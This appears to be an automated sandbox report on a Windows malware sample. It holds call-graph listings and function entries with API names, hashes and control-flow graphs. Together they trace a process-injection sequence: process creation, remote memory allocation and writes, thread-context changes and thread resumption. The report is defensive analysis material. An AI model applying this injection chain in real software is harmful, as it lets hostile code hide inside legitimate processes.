25820 5a896d8 25730->25820 25824 5a896cc 25730->25824 25735 5a8d038 25734->25735 25737 5a8cf87 25735->25737 25738 5a88998 ResumeThread 25735->25738 25739 5a88990 ResumeThread 25735->25739 25736 5a8d946 25737->25657 25738->25736 25739->25736 25741 5a8d10a 25740->25741 25743 5a89448 WriteProcessMemory 25741->25743 25744 5a89450 WriteProcessMemory 25741->25744 25742 5a8d34f 25742->25657 25743->25742 25744->25742 25746 5a8d71e 25745->25746 25748 5a89448 WriteProcessMemory 25746->25748 25749 5a89450 WriteProcessMemory 25746->25749 25747 5a8d385 25747->25657 25748->25747 25749->25747 25751 5a8d32e 25750->25751 25753 5a89448 WriteProcessMemory 25751->25753 25754 5a89450 WriteProcessMemory 25751->25754 25752 5a8d34f 25752->25657 25753->25752 25754->25752 25756 5a8d028 25755->25756 25758 5a88998 ResumeThread 25756->25758 25759 5a88990 ResumeThread 25756->25759 25757 5a8d946 25757->25757 25758->25757 25759->25757 25828 5a88a48 25760->25828 25832 5a88a41 25760->25832 25761 5a8d267 25765 5a88998 ResumeThread 25761->25765 25766 5a88990 ResumeThread 25761->25766 25762 5a8d946 25765->25762 25766->25762 25768 5a8d135 25767->25768 25770 5a8cf87 25767->25770 25771 5a88a48 Wow64SetThreadContext 25768->25771 25772 5a88a41 Wow64SetThreadContext 25768->25772 25769 5a8d8c8 25770->25657 25771->25769 25772->25769 25774 5a8d00d 25773->25774 25776 5a88998 ResumeThread 25774->25776 25777 5a88990 ResumeThread 25774->25777 25775 5a8d946 25775->25775 25776->25775 25777->25775 25779 5a8d193 25778->25779 25779->25778 25780 5a8d81d 25779->25780 25781 5a89448 WriteProcessMemory 25779->25781 25782 5a89450 WriteProcessMemory 25779->25782 25781->25779 25782->25779 25784 5a8d4f1 25783->25784 25786 5a88998 ResumeThread 25784->25786 25787 5a88990 ResumeThread 25784->25787 25785 5a8d946 25786->25785 25787->25785 25789 5a89390 VirtualAllocEx 25788->25789 25791 5a8940d 25789->25791 25791->25707 25793 5a893d0 VirtualAllocEx 25792->25793 25795 5a8940d 25793->25795 25795->25707 25797 5a89540 ReadProcessMemory 25796->25797 25799 5a895cf 25797->25799 25799->25712 25801 5a8958b ReadProcessMemory 25800->25801 25803 5a895cf 25801->25803 25803->25712 25805 5a889d8 ResumeThread 25804->25805 25807 5a88a09 25805->25807 25807->25717 25809 5a88998 ResumeThread 25808->25809 25811 5a88a09 25809->25811 25811->25717 25813 5a89450 WriteProcessMemory 25812->25813 25815 5a894ef 25813->25815 25815->25722 25817 5a89498 WriteProcessMemory 25816->25817 25819 5a894ef 25817->25819 25819->25722 25821 5a89761 CreateProcessA 25820->25821 25823 5a89923 25821->25823 25825 5a896d8 CreateProcessA 25824->25825 25827 5a89923 25825->25827 25829 5a88a8d Wow64SetThreadContext 25828->25829 25831 5a88ad5 25829->25831 25831->25761 25833 5a88a8d Wow64SetThreadContext 25832->25833 25835 5a88ad5 25833->25835 25835->25761 25516 130d0b8 25517 130d0fe GetCurrentProcess 25516->25517 25519 130d150 GetCurrentThread 25517->25519 25522 130d149 25517->25522 25520 130d18d GetCurrentProcess 25519->25520 25523 130d186 25519->25523 25521 130d1c3 25520->25521 25524 130d1eb GetCurrentThreadId 25521->25524 25522->25519 25523->25520 25525 130d21c 25524->25525 25530 1304668 25531 130467a 25530->25531 25532 1304686 25531->25532 25536 1304783 25531->25536 25541 1303e1c 25532->25541 25534 13046a5 25537 130479d 25536->25537 25545 1304883 25537->25545 25549 1304888 25537->25549 25542 1303e27 25541->25542 25557 1305c1c 25542->25557 25544 1306ff0 25544->25534 25547 1304888 25545->25547 25546 130498c 25547->25546 25553 130449c 25547->25553 25551 13048af 25549->25551 25550 130498c 25550->25550 25551->25550 25552 130449c CreateActCtxA 25551->25552 25552->25550 25554 1305918 CreateActCtxA 25553->25554 25556 13059db 25554->25556 25558 1305c27 25557->25558 25561 1305c3c 25558->25561 25560 1307095 25560->25544 25562 1305c47 25561->25562 25565 1305c6c 25562->25565 25564 130717a 25564->25560 25566 1305c77 25565->25566 25569 1305c9c 25566->25569 25568 130726d 25568->25564 25570 1305ca7 25569->25570 25572 1308653 25570->25572 25575 130ad03 25570->25575 25571 1308691 25571->25568 25572->25571 25579 130cdf4 25572->25579 25584 130ad33 25575->25584 25589 130ad38 25575->25589 25576 130ad16 25576->25572 25581 130ce11 25579->25581 25580 130ce35 25580->25571 25581->25580 25615 130cfa0 25581->25615 25619 130cf8f 25581->25619 25585 130ad38 25584->25585 25593 130ae30 25585->25593 25598 130ae23 25585->25598 25586 130ad47 25586->25576 25591 130ae30 LoadLibraryExW 25589->25591 25592 130ae23 LoadLibraryExW 25589->25592 25590 130ad47 25590->25576 25591->25590 25592->25590 25594 130ae41 25593->25594 25595 130ae5c 25593->25595 25594->25595 25603 130b0c3 25594->25603 25607 130b0c8 25594->25607 25595->25586 25599 130ae41 25598->25599 25600 130ae5c 25598->25600 25599->25600 25601 130b0c3 LoadLibraryExW 25599->25601 25602 130b0c8 LoadLibraryExW 25599->25602 25600->25586 25601->25600 25602->25600 25604 130b0dc 25603->25604 25606 130b101 25604->25606 25611 130a870 25604->25611 25606->25595 25608 130b0dc 25607->25608 25609 130b101 25608->25609 25610 130a870 LoadLibraryExW 25608->25610 25609->25595 25610->25609 25612 130b2a8 LoadLibraryExW 25611->25612 25614 130b321 25612->25614 25614->25606 25616 130cfad 25615->25616 25617 130cfe7 25616->25617 25623 130c8d8 25616->25623 25617->25580 25620 130cfad 25619->25620 25621 130cfe7 25620->25621 25622 130c8d8 LoadLibraryExW 25620->25622 25621->25580 25622->25621 25624 130c8dd 25623->25624 25626 130d8f8 25624->25626 25627 130ca04 25624->25627 25626->25626 25628 130ca0f 25627->25628 25629 1305c9c LoadLibraryExW 25628->25629 25630 130d967 25629->25630 25630->25626 25838 5a8dd50 25840 5a8dd52 25838->25840 25839 5a8dedb 25840->25839 25842 5a8ab50 25840->25842 25843 5a8dfd0 PostMessageW 25842->25843 25844 5a8e03c 25843->25844 25844->25840

                                                  Executed Functions

                                                  Function 05A8CF7B Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48e6110a32434844550d667a9803bd9e255ca13e04d246cea94aa12aad95757f
                                                  • Instruction ID: 5ce62ebbd250417d825a4a8c47bacbfa19220270bf2d970358d563502d29e524
                                                  • Opcode Fuzzy Hash: 48e6110a32434844550d667a9803bd9e255ca13e04d246cea94aa12aad95757f
                                                  • Instruction Fuzzy Hash: 28D0C9B094C118DBDB10FF049460EF8F3FAA70B310F5465E1D16EA6541C270DE844F18
                                                  Function 0130D0B3 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 527 130d0b3-130d147 GetCurrentProcess 531 130d150-130d184 GetCurrentThread 527->531 532 130d149-130d14f 527->532 533 130d186-130d18c 531->533 534 130d18d-130d1c1 GetCurrentProcess 531->534 532->531 533->534 535 130d1c3-130d1c9 534->535 536 130d1ca-130d1e5 call 130d293 534->536 535->536 540 130d1eb-130d21a GetCurrentThreadId 536->540 541 130d223-130d285 540->541 542 130d21c-130d222 540->542 542->541
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D136
                                                  • GetCurrentThread.KERNEL32 ref: 0130D173
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 0130D209
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: f78d829c8d6f8b5246214710ba27191d91428b34f11f298300caf5edf4d36ac1
                                                  • Instruction ID: 7a9cf7baba3b4876da7e5cffdf4fbe50304b1c0e3cebeb8e9c05d12adcaf437d
                                                  • Opcode Fuzzy Hash: f78d829c8d6f8b5246214710ba27191d91428b34f11f298300caf5edf4d36ac1
                                                  • Instruction Fuzzy Hash: 125155B0900349CFDB58CFAAD548BEEBBF1AF48314F208459D459A73A0CB749884CF65
                                                  Function 0130D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 549 130d0b8-130d147 GetCurrentProcess 553 130d150-130d184 GetCurrentThread 549->553 554 130d149-130d14f 549->554 555 130d186-130d18c 553->555 556 130d18d-130d1c1 GetCurrentProcess 553->556 554->553 555->556 557 130d1c3-130d1c9 556->557 558 130d1ca-130d1e5 call 130d293 556->558 557->558 562 130d1eb-130d21a GetCurrentThreadId 558->562 563 130d223-130d285 562->563 564 130d21c-130d222 562->564 564->563
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D136
                                                  • GetCurrentThread.KERNEL32 ref: 0130D173
                                                  • GetCurrentProcess.KERNEL32 ref: 0130D1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 0130D209
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: d0528adc44851d08a2ad01de30ae2c0e89f0350f4251571009b0808e4a59658b
                                                  • Instruction ID: e360562e3a3818fa14785d23cf20b638fed5b55b0ccacf69b60805b4f7ade4c7
                                                  • Opcode Fuzzy Hash: d0528adc44851d08a2ad01de30ae2c0e89f0350f4251571009b0808e4a59658b
                                                  • Instruction Fuzzy Hash: 7A5145B0900319CFDB58DFAAD548BEEBBF1AF48314F208459E419A73A0DB749984CF65
                                                  Function 05A896CC Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 641 5a896cc-5a8976d 644 5a8976f-5a89779 641->644 645 5a897a6-5a897c6 641->645 644->645 646 5a8977b-5a8977d 644->646 652 5a897c8-5a897d2 645->652 653 5a897ff-5a8982e 645->653 647 5a8977f-5a89789 646->647 648 5a897a0-5a897a3 646->648 650 5a8978b 647->650 651 5a8978d-5a8979c 647->651 648->645 650->651 651->651 654 5a8979e 651->654 652->653 655 5a897d4-5a897d6 652->655 661 5a89830-5a8983a 653->661 662 5a89867-5a89921 CreateProcessA 653->662 654->648 657 5a897d8-5a897e2 655->657 658 5a897f9-5a897fc 655->658 659 5a897e4 657->659 660 5a897e6-5a897f5 657->660 658->653 659->660 660->660 663 5a897f7 660->663 661->662 664 5a8983c-5a8983e 661->664 673 5a8992a-5a899b0 662->673 674 5a89923-5a89929 662->674 663->658 666 5a89840-5a8984a 664->666 667 5a89861-5a89864 664->667 668 5a8984c 666->668 669 5a8984e-5a8985d 666->669 667->662 668->669 669->669 671 5a8985f 669->671 671->667 684 5a899c0-5a899c4 673->684 685 5a899b2-5a899b6 673->685 674->673 687 5a899d4-5a899d8 684->687 688 5a899c6-5a899ca 684->688 685->684 686 5a899b8 685->686 686->684 689 5a899e8-5a899ec 687->689 690 5a899da-5a899de 687->690 688->687 691 5a899cc 688->691 693 5a899fe-5a89a05 689->693 694 5a899ee-5a899f4 689->694 690->689 692 5a899e0 690->692 691->687 692->689 695 5a89a1c 693->695 696 5a89a07-5a89a16 693->696 694->693 698 5a89a1d 695->698 696->695 698->698
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05A8990E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: adeebc67c58459e48b5a2272eb268e6500e92d0cbf0877274e673fd30c88d670
                                                  • Instruction ID: 4986e7791e97143086d5f8493f951b430a6538db831ac6a8fa3430e4952d5615
                                                  • Opcode Fuzzy Hash: adeebc67c58459e48b5a2272eb268e6500e92d0cbf0877274e673fd30c88d670
                                                  • Instruction Fuzzy Hash: EAA17A71D00619DFDF10DFA9C841BEEBBB2BF48314F0481A9E859A7290DB749985CF92
                                                  Function 05A896D8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 699 5a896d8-5a8976d 701 5a8976f-5a89779 699->701 702 5a897a6-5a897c6 699->702 701->702 703 5a8977b-5a8977d 701->703 709 5a897c8-5a897d2 702->709 710 5a897ff-5a8982e 702->710 704 5a8977f-5a89789 703->704 705 5a897a0-5a897a3 703->705 707 5a8978b 704->707 708 5a8978d-5a8979c 704->708 705->702 707->708 708->708 711 5a8979e 708->711 709->710 712 5a897d4-5a897d6 709->712 718 5a89830-5a8983a 710->718 719 5a89867-5a89921 CreateProcessA 710->719 711->705 714 5a897d8-5a897e2 712->714 715 5a897f9-5a897fc 712->715 716 5a897e4 714->716 717 5a897e6-5a897f5 714->717 715->710 716->717 717->717 720 5a897f7 717->720 718->719 721 5a8983c-5a8983e 718->721 730 5a8992a-5a899b0 719->730 731 5a89923-5a89929 719->731 720->715 723 5a89840-5a8984a 721->723 724 5a89861-5a89864 721->724 725 5a8984c 723->725 726 5a8984e-5a8985d 723->726 724->719 725->726 726->726 728 5a8985f 726->728 728->724 741 5a899c0-5a899c4 730->741 742 5a899b2-5a899b6 730->742 731->730 744 5a899d4-5a899d8 741->744 745 5a899c6-5a899ca 741->745 742->741 743 5a899b8 742->743 743->741 746 5a899e8-5a899ec 744->746 747 5a899da-5a899de 744->747 745->744 748 5a899cc 745->748 750 5a899fe-5a89a05 746->750 751 5a899ee-5a899f4 746->751 747->746 749 5a899e0 747->749 748->744 749->746 752 5a89a1c 750->752 753 5a89a07-5a89a16 750->753 751->750 755 5a89a1d 752->755 753->752 755->755
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05A8990E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 411b636ce1c88954b69fdddba09d4880bc030a4f65958c88c3705bfbe278c332
                                                  • Instruction ID: ce266d3b1fc63fe23108fccce0dd5748f1c9493b87dab75dccc949e66b34692e
                                                  • Opcode Fuzzy Hash: 411b636ce1c88954b69fdddba09d4880bc030a4f65958c88c3705bfbe278c332
                                                  • Instruction Fuzzy Hash: D8917A71D002199FDF10DFA9C841BEEBBB2BF48314F0481A9E859A7250DB749985CF92
                                                  Function 0130449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 756 130449c-13059d9 CreateActCtxA 759 13059e2-1305a3c 756->759 760 13059db-13059e1 756->760 767 1305a4b-1305a4f 759->767 768 1305a3e-1305a41 759->768 760->759 769 1305a60 767->769 770 1305a51-1305a5d 767->770 768->767 772 1305a61 769->772 770->769 772->772
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 2c9f26929b75102d2e258d898c043b5526bd85056ad0ded272451ad58d68cd4f
                                                  • Instruction ID: 31b1229c65bd524f68d1da41fbfc3bd156715e17d3cda009add4849252f9446a
                                                  • Opcode Fuzzy Hash: 2c9f26929b75102d2e258d898c043b5526bd85056ad0ded272451ad58d68cd4f
                                                  • Instruction Fuzzy Hash: FA41C1B1C0071DCADB25CFAAC844B9EBBF5BF49304F24846AD408AB255DBB56985CF90
                                                  Function 0130590F Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 773 130590f 774 130591c-13059d9 CreateActCtxA 773->774 776 13059e2-1305a3c 774->776 777 13059db-13059e1 774->777 784 1305a4b-1305a4f 776->784 785 1305a3e-1305a41 776->785 777->776 786 1305a60 784->786 787 1305a51-1305a5d 784->787 785->784 789 1305a61 786->789 787->786 789->789
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: c76fe8c84f89445b5bd48f2a2ec869006a6ca09dc86444e325b788ca1cd9333c
                                                  • Instruction ID: 0a6bd802eff6cc2ba536adad098efd4f9803cdff010363ea0d2105325c989ffc
                                                  • Opcode Fuzzy Hash: c76fe8c84f89445b5bd48f2a2ec869006a6ca09dc86444e325b788ca1cd9333c
                                                  • Instruction Fuzzy Hash: 0841EFB1C00619CEEB25CFAAC8847CDBBF5BF48308F24845AD408AB251DB75598ACF90
                                                  Function 05A89448 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 790 5a89448-5a8949e 793 5a894ae-5a894ed WriteProcessMemory 790->793 794 5a894a0-5a894ac 790->794 796 5a894ef-5a894f5 793->796 797 5a894f6-5a89526 793->797 794->793 796->797
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05A894E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 47ce26d2871b80651079789521969db4aba42795cdb1c3bca373f0079f68294c
                                                  • Instruction ID: a4f0245872322d2bf37f953b35c08561799e7c8c0c7f92b22b8e10e560653418
                                                  • Opcode Fuzzy Hash: 47ce26d2871b80651079789521969db4aba42795cdb1c3bca373f0079f68294c
                                                  • Instruction Fuzzy Hash: 152128B59003599FCB10DFA9C885BEEBBF5FF48310F108429E959A7350C774A554CBA4
                                                  Function 05A89450 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 801 5a89450-5a8949e 803 5a894ae-5a894ed WriteProcessMemory 801->803 804 5a894a0-5a894ac 801->804 806 5a894ef-5a894f5 803->806 807 5a894f6-5a89526 803->807 804->803 806->807
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05A894E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: aaa33af7c5e25f96a16d3ad7a17e33092a34f6f32cdb906d3eb4e54c0291ffde
                                                  • Instruction ID: 0a4bbf30a51203d2fc6f7272b96a3df32cf7266f5186c67b40d18e1310780b0f
                                                  • Opcode Fuzzy Hash: aaa33af7c5e25f96a16d3ad7a17e33092a34f6f32cdb906d3eb4e54c0291ffde
                                                  • Instruction Fuzzy Hash: B42127B19003599FCB10DFAAC885BEEBBF5FF48320F108429E959A7250C7789954CBA4
                                                  Function 05A89538 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 811 5a89538-5a895cd ReadProcessMemory 815 5a895cf-5a895d5 811->815 816 5a895d6-5a89606 811->816 815->816
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05A895C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: a5ce67c59a90b1ade780f59f1735e5594b2185d3dd605bfa25207d279ff804f5
                                                  • Instruction ID: 5c2f09f7f3eec791d1a4dfc3ce8530adfe10bc8cf52670d3524a40b2042fd6d7
                                                  • Opcode Fuzzy Hash: a5ce67c59a90b1ade780f59f1735e5594b2185d3dd605bfa25207d279ff804f5
                                                  • Instruction Fuzzy Hash: 222128B1D003599FCB10DFAAC881AEEFBF5FF48314F10842AE959A7250C734A545CBA5
                                                  Function 0130D2FB Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 820 130d2fb-130d394 DuplicateHandle 821 130d396-130d39c 820->821 822 130d39d-130d3ba 820->822 821->822
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D387
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 32736e40ab7d6dfbd67b7aae2b679b408fdfa30dbec440c316dafcc278f26038
                                                  • Instruction ID: da068ecf5a46db99430edb11dd0b7cff901a0738b4a555678c81d781f7f2c39a
                                                  • Opcode Fuzzy Hash: 32736e40ab7d6dfbd67b7aae2b679b408fdfa30dbec440c316dafcc278f26038
                                                  • Instruction Fuzzy Hash: 292103B59002489FDB10CFAAD584AEEFFF4EB48310F14805AE958A3250C374A945CFA0
                                                  Function 05A89540 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05A895C0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 6bdf2ca59b59c1973e5a5b0be49c2107f28558878ef45ca0a5546591d670511f
                                                  • Instruction ID: 2e5caa7518c8f4b20cdcca009b484dd83f8396c24730bcb23893a374c17140a8
                                                  • Opcode Fuzzy Hash: 6bdf2ca59b59c1973e5a5b0be49c2107f28558878ef45ca0a5546591d670511f
                                                  • Instruction Fuzzy Hash: 6A2139B1D003599FCB10DFAAC840AEEFBF5FF48310F108429E559A7250C7349544CBA4
                                                  Function 05A88A48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 825 5a88a48-5a88a93 827 5a88aa3-5a88ad3 Wow64SetThreadContext 825->827 828 5a88a95-5a88aa1 825->828 830 5a88adc-5a88b0c 827->830 831 5a88ad5-5a88adb 827->831 828->827 831->830
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05A88AC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 4f5c9ce8de754e313d090937c68b93ba7cbd6b38d89274090a0cdb7a3aa79e10
                                                  • Instruction ID: a531e890c62c8ee8be6bb162117c5f6cc66139ee42dff21816463f92d3ab55d3
                                                  • Opcode Fuzzy Hash: 4f5c9ce8de754e313d090937c68b93ba7cbd6b38d89274090a0cdb7a3aa79e10
                                                  • Instruction Fuzzy Hash: E4211AB29042098FDB10DFAAC445BEEFBF4EF48314F548429D459A7241CB78A544CFA5
                                                  Function 0130D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D387
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1721066910.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1300000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 1a511c96adf0c1780861c09650630ddc42b940afb56f9e7c732fa55ca1335794
                                                  • Instruction ID: 4bd725c1e07e98cdf1a9214a1921cc22c74697c951bac8d9fc6a5dba7c3077a6
                                                  • Opcode Fuzzy Hash: 1a511c96adf0c1780861c09650630ddc42b940afb56f9e7c732fa55ca1335794
                                                  • Instruction Fuzzy Hash: 8921E4B5900248DFDB10CF9AD984ADEFFF8EB48310F14841AE958A7350C374A954CFA4
                                                  Function 05A88A41 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05A88AC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: d06f513b85b085891c9a4890b4021fc8db3b23cd93c6a7185e0258bce140b410
                                                  • Instruction ID: e3cc34da47f3c19725fee7c3349c4818493da0a2169c54c00af174783284cf93
                                                  • Opcode Fuzzy Hash: d06f513b85b085891c9a4890b4021fc8db3b23cd93c6a7185e0258bce140b410
                                                  • Instruction Fuzzy Hash: C62137B69002098FDB10DFA9C585BEEFBF4EF48314F54882AD459A7241CB78A544CFA4
                                                  Function 05A89388 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05A893FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1726548494.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5a80000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: f100a0d0bba4d197fec1eddc736809826ad17592d4c4e3b6dc10ff4d2afa647f
                                                  • Instruction ID: 9354cfe9945cd61ee5a03cc3394af42cd812225b50106c90eab8b0d7f0993888
